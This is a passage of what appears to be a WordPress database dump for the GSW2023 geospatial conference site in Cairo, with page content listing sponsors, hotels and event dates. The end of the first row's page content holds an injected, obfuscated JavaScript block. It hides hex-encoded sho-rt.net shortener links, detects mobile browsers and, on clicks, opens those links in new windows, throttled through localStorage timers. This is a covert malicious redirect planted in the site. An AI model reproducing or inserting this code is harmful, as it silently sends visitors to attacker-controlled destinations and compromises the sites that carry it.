x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:37:45','2023-06-24 01:37:45','',3066,'https://gsw2023.com/?p=4798',0,'revision','',0),
(4799,1,'2023-06-24 01:38:17','2023-06-24 01:38:17','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" 